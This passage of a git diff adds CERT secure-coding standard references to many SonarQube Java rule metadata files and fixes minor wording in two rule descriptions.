diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json
index 5cd731e39c2..05eb7e95ace 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1065_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1065",
"sqKey": "S1065",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json
index 2e39436a5e1..0c7c3c591ba 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S106_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"OWASP": [
"A3"
+ ],
+ "CERT": [
+ "ERR02-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html
index 39925b53eb1..91c58f63eed 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.html
@@ -8,7 +8,7 @@ Noncompliant Code Example
public class Foo {
public Collection<User> listUsers() {
- File userList = new File("/home/mylogin/Dev/users.txt"); // Non-Compliant
+ File userList = new File("/home/mylogin/Dev/users.txt"); // Noncompliant
Collection<User> users = parse(userList);
return users;
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json
index 6fe3c8dd452..5248c0cb905 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1075_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1075",
"sqKey": "S1075",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC03-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json
index d0eeee5e65d..db153e53e7f 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1111_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
586
+ ],
+ "CERT": [
+ "MET12-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json
index b97a3396ac8..78e033e8889 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1113_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1113",
"sqKey": "ObjectFinalizeOverridenCheck",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MET12-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json
index 4442af5526c..57084b05a46 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1114_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
568
+ ],
+ "CERT": [
+ "MET12-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json
index fbc2f706c06..35c4b642041 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1116_java.json
@@ -13,5 +13,12 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1116",
"sqKey": "S1116",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C.",
+ "MSC51-J.",
+ "EXP15-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json
index 4de7683f6ad..2e248b1ea4d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1117_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1117",
"sqKey": "S1117",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL51-J.",
+ "DCL01-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json
index b6980fd9369..fc5809607de 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1121_java.json
@@ -18,6 +18,11 @@
"securityStandards": {
"CWE": [
481
+ ],
+ "CERT": [
+ "EXP45-C.",
+ "EXP51-J.",
+ "EXP19-CPP."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json
index addec823853..b02c9f59710 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S112_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
397
+ ],
+ "CERT": [
+ "ERR07-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json
index d76da59c60c..178dbb93de0 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1143_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
584
+ ],
+ "CERT": [
+ "ERR04-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json
index 14f1dd1fafc..6adbcf98ad7 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1147_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
382
+ ],
+ "CERT": [
+ "ERR09-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json
index 3f595107222..bffc2ba68de 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1163_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1163",
"sqKey": "S1163",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "ERR05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json
index d45e9af3ec4..39c93465f50 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1166_java.json
@@ -23,6 +23,9 @@
],
"OWASP": [
"A10"
+ ],
+ "CERT": [
+ "ERR00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json
index c2353d8661f..6c6f3c74793 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1168_java.json
@@ -12,5 +12,11 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1168",
"sqKey": "S1168",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MSC19-C.",
+ "MET55-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json
index 866ffcac2de..a1ab3848433 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1172_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1172",
"sqKey": "S1172",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json
index 7927343213d..0214f535160 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1174_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
583
+ ],
+ "CERT": [
+ "MET12-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html
index 9dc37a97574..4bb11828691 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1176_java.html
@@ -13,7 +13,7 @@
All parameters documented with @param, and names should match.
All checked exceptions documented with @throws
@return present and documented when not void.
- Placeholders like "TODO", "FIXME", "..." should be avoided.
+ Placeholders like "TODO", "FIXME", "..." should be avoided.
The following public methods and constructors are not taken into account by this rule:
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json
index ccc35882ebd..c600fae2e7b 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1181_java.json
@@ -20,6 +20,9 @@
"securityStandards": {
"CWE": [
396
+ ],
+ "CERT": [
+ "ERR08-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json
index aa3e43a9187..3ce3a4307af 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1182_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
580
+ ],
+ "CERT": [
+ "MET53-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json
index 3de658710a4..4d779ff745e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1193_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1193",
"sqKey": "S1193",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "ERR51-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json
index 857437accb8..49f8859dbbb 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1206_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
581
+ ],
+ "CERT": [
+ "MET09-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json
index aca07a20ab6..13c27c9e5c8 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1217_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
572
+ ],
+ "CERT": [
+ "THI00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json
index f8fe09dc3f8..55978f81615 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S121_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-121",
"sqKey": "S121",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "EXP19-C.",
+ "EXP52-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json
index 60de6eb10c0..82079367df9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S126_java.json
@@ -12,5 +12,11 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-126",
"sqKey": "S126",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC01-C.",
+ "MSC57-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json
index 835827bf766..56f8954bfab 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S128_java.json
@@ -18,6 +18,10 @@
"securityStandards": {
"CWE": [
484
+ ],
+ "CERT": [
+ "MSC17-C.",
+ "MSC52-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json
index 0858955d737..c0d558d9239 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1313_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"OWASP": [
"A3"
+ ],
+ "CERT": [
+ "MSC03-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json
index ab520af8079..2b8fc19bfbd 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1314_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Blocker",
"ruleSpecification": "RSPEC-1314",
"sqKey": "S1314",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL18-C.",
+ "DCL50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json
index d9ca9efd5cc..6a78c5f3030 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S131_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
478
+ ],
+ "CERT": [
+ "MSC01-C."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json
index 96c2e91e3c0..b5c4d36902a 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1444_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
500
+ ],
+ "CERT": [
+ "OBJ10-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json
index b6b6852afa5..862a912827c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1449_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1449",
"sqKey": "S1449",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "STR02-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json
index 93e47bc5c36..858192c2fc9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1656_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1656",
"sqKey": "S1656",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json
index 24d3639ce43..318c1960698 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1659_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1659",
"sqKey": "S1659",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "DCL52-J.",
+ "DCL04-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json
index 4166a3a35d4..fde613ae0bd 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1696_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
395
+ ],
+ "CERT": [
+ "ERR08-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json
index da0c9eaeb97..904a1f1881c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1698_java.json
@@ -19,6 +19,10 @@
"CWE": [
595,
597
+ ],
+ "CERT": [
+ "EXP03-J.",
+ "EXP50-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json
index 25c919fa429..5bd1d74dfcc 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1699_java.json
@@ -13,5 +13,11 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-1699",
"sqKey": "S1699",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "MET05-J.",
+ "OOP50-CPP."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json
index 411e7157207..3bd31292d48 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1764_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1764",
"sqKey": "S1764",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json
index 77b528f47e6..89215444a0d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1854_java.json
@@ -18,6 +18,10 @@
"securityStandards": {
"CWE": [
563
+ ],
+ "CERT": [
+ "MSC13-C.",
+ "MSC56-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json
index 42f64264e3e..92ce3266513 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1860_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1860",
"sqKey": "S1860",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "LCK01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json
index 7b9a092eb15..f1dc477cd7c 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1862_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-1862",
"sqKey": "S1862",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "MSC12-C."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json
index 944e0ee99b0..c6be7055168 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1872_java.json
@@ -17,6 +17,9 @@
"securityStandards": {
"CWE": [
486
+ ],
+ "CERT": [
+ "OBJ09-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json
index b38bb6dc067..3648adfae1d 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1874_java.json
@@ -18,6 +18,9 @@
"securityStandards": {
"CWE": [
477
+ ],
+ "CERT": [
+ "MET02-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json
index 1d07699b490..5344ff903f6 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1943_java.json
@@ -14,5 +14,11 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-1943",
"sqKey": "S1943",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "STR04-J.",
+ "STR50-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json
index a6569caccf3..0b784d66351 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S1989_java.json
@@ -22,6 +22,9 @@
],
"OWASP": [
"A3"
+ ],
+ "CERT": [
+ "ERR01-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json
index 63abae0c543..a2c36021cda 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2057_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2057",
"sqKey": "S2057",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "SER00-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json
index 72e389116ca..3f83424d4c9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2059_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2059",
"sqKey": "S2059",
- "scope": "Main"
+ "scope": "Main",
+ "securityStandards": {
+ "CERT": [
+ "SER05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json
index e7fee8eefdd..e44e377bfef 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2061_java.json
@@ -12,5 +12,10 @@
"defaultSeverity": "Major",
"ruleSpecification": "RSPEC-2061",
"sqKey": "S2061",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "SER01-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json
index 5244aba913e..1206915f6d2 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2066_java.json
@@ -13,5 +13,10 @@
"defaultSeverity": "Minor",
"ruleSpecification": "RSPEC-2066",
"sqKey": "S2066",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "SER05-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json
index f76ac47d770..068ad25e92e 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2068_java.json
@@ -23,6 +23,9 @@
],
"OWASP": [
"A2"
+ ],
+ "CERT": [
+ "MSC03-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json
index 93a1604b165..d61ac95d186 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2077_java.json
@@ -29,6 +29,9 @@
],
"OWASP": [
"A1"
+ ],
+ "CERT": [
+ "IDS00-J."
]
}
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json
index 8c9a9111175..8e6b279d9e8 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2093_java.json
@@ -14,5 +14,10 @@
"defaultSeverity": "Critical",
"ruleSpecification": "RSPEC-2093",
"sqKey": "S2093",
- "scope": "All"
+ "scope": "All",
+ "securityStandards": {
+ "CERT": [
+ "ERR54-J."
+ ]
+ }
}
diff --git a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json
index 930d3e1abbe..5b9ab0079d9 100644
--- a/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json
+++ b/java-checks/src/main/resources/org/sonar/l10n/java/rules/java/S2095_java.json
@@ -20,6 +20,10 @@
"CWE": [
459,
772
+ ],
+ "CERT": [
